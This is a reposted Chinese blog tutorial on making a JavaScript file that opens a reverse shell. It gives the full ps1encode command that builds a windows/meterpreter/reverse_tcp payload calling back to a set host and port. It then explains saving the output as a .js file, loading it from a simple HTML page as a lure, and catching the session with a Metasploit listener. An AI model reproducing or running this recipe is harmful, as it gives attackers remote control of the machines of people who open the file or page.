首页 安全文摘 正文

利用js文件反弹shell

0x00:简介 前两天在freebuf上看到一个利用Ink文件触发攻击链的文章,确实佩服作者的脑洞。https://www.freebuf.com/articles/system/207109.html 网络世界千奇百怪,多样式留后门,触发条件反弹shell.操作够骚才是王道。0x01:过程一、利用工具https://github.com/Cro

0x00:简介

    前两天在freebuf上看到一个利用Ink文件触发攻击链的文章,确实佩服作者的脑洞。

https://www.freebuf.com/articles/system/207109.html

    网络世界千奇百怪,多样式留后门,触发条件反弹shell.操作够骚才是王道。

0x01:过程

一、利用工具

https://Github.com/CroweCybersecurity/ps1encode

二、环境配置

    它有很多种生成方式,详情请移步gayhub上查看

    今天利用生成的js文件来反弹shell

利用js文件反弹shell shell反弹 安全文摘 安全文摘  第1张

命令:./ps1encode.rb--LHOST 192.168.124.11 --LPORT 6666 --Payload windows/Meterpreter/reverse_tcp --ENCODE cmd -t js

利用此命令生成js文件

利用js文件反弹shell shell反弹 安全文摘 安全文摘  第2张

    emmm!代码很长,自己复制出来放到txt编辑器里。

并重命名为1.js(文件名随意)。

利用js文件反弹shell shell反弹 安全文摘 安全文摘  第3张

    单单放一个js太单调了。实际环境下可以配合html进行调用js文件执行。

    

利用js文件反弹shell shell反弹 安全文摘 安全文摘  第4张

    我简单的写了一个html来调用js文件

当然你也可以 一个js就反弹

利用js文件反弹shell shell反弹 安全文摘 安全文摘  第5张

准备好msf回弹的环境

执行Exploit 坐等监听执行

三、执行效果

利用js文件反弹shell shell反弹 安全文摘 安全文摘  第6张

效果图

视频效果图

0x02:后话

    或许我的步骤会出现错误、或许我的想法会出现错误。但是我的思路是偏僻的。我每次写的文章想表达不是炫技,我跟各位比,我还是小学生,我是小菜鸟。我想表达的是思路。如果以后有表达不清楚的,造成您的质疑,您可以问我,或者百度

文由微信公众号洛米唯熊

本文转载自互联网,如有侵权,联系删除

转载请注明本文地址:https://heibai.org.cn/1451.html

相关推荐

发布评论

ainiaobaibaibaibaobaobeishangbishibizuichiguachijingchongjingdahaqiandaliandangaodw_dogedw_erhadw_miaodw_tuzidw_xiongmaodw_zhutouganbeigeiliguiguolaiguzhanghahahahashoushihaixiuhanheixianhenghorse2huaixiaohuatonghuaxinhufenjiayoujiyankeaikeliankouzhaokukuloukunkuxiaolandelinileimuliwulxhainiolxhlikelxhqiuguanzhulxhtouxiaolxhwahahalxhzanningwennonuokpinganqianqiaoqinqinquantouruoshayanshengbingshiwangshuaishuijiaosikaostar0star2star3taikaixintanshoutianpingtouxiaotuwabiweifengweiquweiwuweixiaowenhaowoshouwuxiangjixianhuaxiaoerbuyuxiaokuxiaoxinxinxinxinsuixixixuyeyinxianyinyueyouhenghengyuebingyueliangyunzanzhajizhongguozanzhoumazhuakuangzuohenghengzuoyi
感谢您的支持